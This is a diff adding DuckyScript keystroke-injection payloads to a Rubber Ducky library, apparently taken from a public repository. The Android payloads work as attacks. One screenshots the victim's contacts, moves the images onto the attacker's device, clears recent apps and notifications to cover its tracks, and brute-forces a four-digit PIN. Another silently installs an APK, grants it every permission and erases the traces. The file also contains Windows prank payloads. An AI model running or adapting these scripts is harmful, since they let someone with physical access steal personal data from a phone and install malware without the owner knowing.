+DELAY 1000
+REM # Going home
+GUI ENTER
+DELAY 1000
+REM # Jump to contacts, take screenshot - scroll, rinse and repeat
+GUI c
+DELAY 1000
+DOWNARROW
+DELAY 1000
+ALT PRINTSCREEN
+DELAY 1000
+REM # Escape is used to close out the window opened after a screenshot is taken
+ESC
+
+VAR $CONTACTS = 9
+WHILE ( $CONTACTS > 0 )
+    DELAY 200
+    PAGEDOWN
+    DELAY 1000
+    ALT PRINTSCREEN
+    DELAY 1000
+    ESC
+    $CONTACTS = ( $CONTACTS - 1 )
+END_WHILE
+
+DELAY 1000
+REM # Jump to file manager, find screenshots folder and move there
+GUI r
+DELAY 200
+REM # Search for recent screenshots
+DELAY 200
+ENTER
+DELAY 200
+ENTER
+DELAY 1000
+REM # Reset keyboard for good measure
+RESET
+DELAY 500
+STRING screenshot
+DELAY 1000
+ENTER
+DELAY 200
+REM # Select all screenshots
+CTRL a
+REM # Select the "move" option
+DELAY 1000
+PAGEDOWN
+DELAY 200
+DOWNARROW
+DELAY 200
+DOWNARROW
+DELAY 200
+DOWNARROW
+DELAY 200
+LEFTARROW
+DELAY 200
+LEFTARROW
+DELAY 200
+ENTER
+REM # Select the ducky storage as the move location
+REM # Jump to previous window
+DELAY 1000
+TAB
+DELAY 200
+ENTER
+REM # Jump to previous window
+DELAY 1000
+LEFTARROW
+DELAY 200
+ENTER
+REM # Select ducky storage
+
+VAR $HOP = 5
+WHILE ( $HOP > 0 )
+    DELAY 200
+    DOWNARROW
+    $HOP = ( $HOP - 1 )
+END_WHILE
+
+ENTER
+REM # In ducky storage, select "move here"
+DELAY 200
+PAGEDOWN
+DELAY 200
+DOWNARROW
+DELAY 200
+DOWNARROW
+DELAY 200
+DOWNARROW
+DELAY 200
+RIGHTARROW
+DELAY 200
+RIGHTARROW
+DELAY 200
+ENTER
+REM # Returning to home
+DELAY 1000
+GUI ENTER
+DELAY 200
+REM # Start cleaning up and reduce footprint 
+REM # Open and close out most recent tabs on the device
+
+VAR $WIPE = 8
+WHILE ( $WIPE > 0 )
+    ALT TAB
+    DELAY 200
+    ALT F4
+    DELAY 200
+    $WIPE = ( $WIPE - 1 )
+END_WHILE
+
+DELAY 200
+GUI ENTER
+DELAY 1000
+REM # Clear device notifications
+GUI n
+DELAY 500
+UPARROW
+DELAY 100
+RIGHTARROW
+DELAY 100
+ENTER
+DELAY 1000
+REM # Return home
+GUI ENTER
+DELAY 1000
+REM # Lock device and turn attackmode off
+GUI l
+DELAY 300
+ATTACKMODE OFF
+END_BUTTON
+
+DELAY 3000
+REM # Scroll up, wake screen and start cracking
+REM # The first five strings you can add possible pins gathered from recon 
+REM # data by replacing the x's with pins. This payload is for a 4 digit pin. 
+REM # The pin length can be modified by increasing X string length 
+ATTACKMODE HID
+DELAY 100
+SPACE
+DELAY 100
+SPACE
+DELAY 1000
+STRING X
+STRING X
+STRING X
+STRING X
+ENTER
+DELAY 2000
+STRING X
+STRING X
+STRING X
+STRING X
+ENTER
+DELAY 2000
+STRING X
+STRING X
+STRING X
+STRING X
+ENTER
+DELAY 2000
+STRING X
+STRING X
+STRING X
+STRING X
+ENTER
+DELAY 2000
+STRING X
+STRING X
+STRING X
+STRING X
+ENTER
+DELAY 32000

payloads/library/mobile/Android/ANDROID_BLANKET_PARTY/swipe-to-open.txt

@@ -0,0 +1,126 @@
+REM #TITLE: Android 13 Payload
+REM #AUTHOR: $@LVAT10N!
+REM #DESCRIPTION: Android payload to support android 13. This payload will 
+REM # install an apk to the target device that resides in the ducky storage.
+REM # Payload is for device with "swipe to unlock" lockscreen, no pin or password enabled
+
+DELAY 3000
+ATTACKMODE HID STORAGE
+REM # scroll up to unlock device
+SPACE
+DELAY 100
+SPACE
+DELAY 2000
+REM # Open file manager
+GUI r
+DELAY 2000
+REM # Find the ducky in the device file manager.
+
+VAR $SEEK = 4
+WHILE ( $SEEK > 0 )
+    DELAY 200
+    DOWNARROW
+    $SEEK = ( $SEEK - 1 )
+END_WHILE
+
+ENTER
+REM # Select payload
+DELAY 2000
+
+VAR $FALL = 13
+WHILE ( $FALL > 0 )
+    TAB
+    DELAY 100
+    $FALL = ( $FALL - 1 )
+END_WHILE
+
+ENTER
+REM # Allow installation of unknown apps (Step 1: Deal with unruly nurse Buck)
+DELAY 1000
+TAB
+DELAY 100
+TAB
+DELAY 100
+ENTER
+DELAY 1000
+REM # Move slider to allow installation via the file manager (Step 2: Find Bucks truck)
+VAR $SLIDER = 12
+WHILE ( $SLIDER > 0 )
+    TAB
+    DELAY 100
+    $SLIDER = ( $SLIDER - 1 )
+END_WHILE
+
+ENTER
+REM # YES!! install the payload ( Step 3: Get in the truck)
+DELAY 1500
+TAB
+DELAY 100
+ENTER
+REM # I know it's a payload, INSTALL ANYWAY!!
+DELAY 1500
+TAB
+DELAY 100
+ENTER
+REM # From here the warning screen is exploited by simply waiting
+REM # 45 seconds so the device will sleep and the warning times out. 
+REM # When the device wakes up the apk is installed (Step 4: Wiggle your big toe)
+DELAY 45000
+SPACE
+DELAY 100
+SPACE
+DELAY 100
+SPACE
+DELAY 2000
+REM # Select and click open
+DELAY 200
+ENTER
+REM # Allow all Permissions for apk
+DELAY 1500
+
+VAR $ALLOW = 11
+WHILE ( $ALLOW > 0 )
+    DOWNARROW
+    DELAY 100
+    $ALLOW = ( $ALLOW - 1 )
+END_WHILE
+
+DELAY 100
+RIGHTARROW
+DELAY 100
+ENTER
+REM # Click OK, nobody cares ..
+DELAY 1500
+TAB
+DELAY 100
+ENTER
+REM # Delete all recent tabs that were opened on the device
+DELAY 1000
+
+VAR $WIPE = 8
+WHILE ( $WIPE > 0 )
+    ALT TAB
+    DELAY 100
+    ALT F4
+    DELAY 100
+    $WIPE = ( $WIPE - 1 )
+END_WHILE
+
+REM # If not already at the home screen, going to home screen
+DELAY 1000
+GUI ENTER
+DELAY 1000
+REM # Clearing device notifications
+GUI n
+DELAY 500
+UPARROW
+DELAY 100
+RIGHTARROW
+DELAY 100
+ENTER
+DELAY 1000
+REM # Locking the device back up
+DELAY 500
+GUI l
+REM # Setting attackmode to "off"
+ATTACKMODE OFF

payloads/library/prank/Hacker_Typer/payload.txt

@@ -3,10 +3,10 @@ REM Title: Hacker Typer
 REM Author:	UberGuidoZ
 REM Description: Opens a harmless website and types like a hacker
 REM Target:	Windows but easily modified to work on any OS with a browser
-REM Version:	1.0
+REM Version:	1.1
 REM Category:	Prank
 REM Source: https://github.com/UberGuidoZ/OMG-Payloads
-REM
+ATTACKMODE HID STORAGE
 DELAY 1500
 GUI r
 DELAY 1000

payloads/library/prank/Resolution_Prank/README.md

@@ -0,0 +1,5 @@
+# Resolution Prank
+
+This payload will go into windows based systems and change the resolution of the victim to the lowest possible setting. When finished, the LED will flash red and green, and at that point if you hit CAPS it will reset the monitor to the highest resolution allowed.
+
+### Somewhat resource dependent, may not work on older computers

payloads/library/prank/Resolution_Prank/payload.txt

@@ -0,0 +1,103 @@
+REM TITLE Resolution Prank
+REM AUTHOR Mavisinator30001
+REM TARGET Any system running Windows 10/11
+REM DESCRIPTION Goes into Windows settings and change the screen resolution. When finished, toggle caps to change display back
+EXTENSION PASSIVE_WINDOWS_DETECT
+    REM VERSION 1.1
+    REM AUTHOR: Korben
+
+    REM_BLOCK DOCUMENTATION
+        Windows fully passive OS Detection and passive Detect Ready
+        Includes its own passive detect ready.
+        Does not require additional extensions.
+
+        USAGE:
+            Extension runs inline (here)
+            Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+            boot delay
+            $_OS will be set to WINDOWS or NOT_WINDOWS
+            See end of payload for usage within payload
+    END_REM
+
+    REM CONFIGURATION:
+    DEFINE #MAX_WAIT 150
+    DEFINE #CHECK_INTERVAL 20
+    DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+    DEFINE #NOT_WINDOWS 7
+
+    $_OS = #NOT_WINDOWS
+
+    VAR $MAX_TRIES = #MAX_WAIT
+    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+        DELAY #CHECK_INTERVAL
+        $MAX_TRIES = ($MAX_TRIES - 1)
+    END_WHILE
+    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+        $_OS = WINDOWS
+    END_IF
+
+    REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+        IF ($_OS == WINDOWS) THEN
+            STRING HELLO WINDOWS!
+        ELSE
+            STRING HELLO WORLD!
+        END_IF
+    END_REM
+END_EXTENSION
+IF $_OS != WINDOWS
+    STOP_PAYLOAD
+END_IF
+LED_G
+DELAY 500
+CTRL GUI d
+DELAY 500
+GUI i
+DELAY 2000
+STRINGLN display
+DELAY 2500
+TAB
+ENTER
+DELAY 200
+REPEAT 8 TAB
+ENTER
+VAR $CAPS_STATE = $_CAPSLOCK_ON
+WHILE ($CAPS_STATE == $_CAPSLOCK_ON)
+HOLD DOWN
+DELAY 1000
+    RELEASE DOWN
+    ENTER
+    DELAY 200
+    LEFT
+    DELAY 200
+    ENTER
+
+    REM WHEN FINISHED WITH THE FIRST PART OF THE PAYLOAD DUCK WILL FLASH LED
+    VAR $LIGHT_UP_TIMES = 20
+    WHILE ($LIGHT_UP_TIMES > 0)
+        LED_G
+        DELAY 300
+        LED_OFF
+        DELAY 300
+        LED_R
+        DELAY 300
+        LED_OFF
+        DELAY 300
+        $LIGHT_UP_TIMES = $LIGHT_UP_TIMES - 1
+    END_WHILE
+    WAIT_FOR_CAPS_CHANGE
+END_WHILE
+DELAY 300
+REPEAT 12 TAB
+ENTER
+DELAY 200
+HOLD UP
+DELAY 1000
+RELEASE UP
+ENTER
+DELAY 200
+LEFT
+ENTER
+DELAY 1000
+ALT F4
+DELAY 200
+CTRL GUI F4

payloads/library/prank/Rick_Rolling_Forever/payload.txt

@@ -5,9 +5,10 @@ REM
 REM Description: Creates a batch file that opens a Rick Roll every 5 mins in default browser
 REM Notes: Creates batch file, starts batch file, minimizes the window
 REM Target:	Windows but fairly easily modified to work on any OS with a browser
-REM Version:	1.3
+REM Version:	1.5
 REM Category:	Prank
 REM Source: https://github.com/UberGuidoZ/OMG-Payloads
+ATTACKMODE HID STORAGE
 DELAY 2000
 GUI r
 DELAY 500
@@ -20,6 +21,7 @@ DELAY 1000
 STRING copy con rr.bat
 ENTER
 STRING @ECHO OFF
+ENTER
 STRING PING 127.0.0.1 -n 5 > NUL
 ENTER
 STRING :LOOP
@@ -30,7 +32,7 @@ STRING PING 127.0.0.1 -n 300 > NUL
 ENTER
 STRING GOTO LOOP
 ENTER
-CTRL C
+CTRL c
 DELAY 1000
 STRING cls && rr.bat
 ENTER

payloads/library/prank/The_Matrix-Wake_Up/payload.txt

@@ -2,7 +2,8 @@ REM Title: The Matrix Wake Up
 REM Description: Recreates the Wake Up Neo terminal scene in The Matrix
 REM Author: UberGuidoZ
 REM Target: Windows (including Powershell 2.0 or above)
-
+REM Version: v1.1
+ATTACKMODE HID STORAGE
 DELAY 3000
 GUI r
 DELAY 750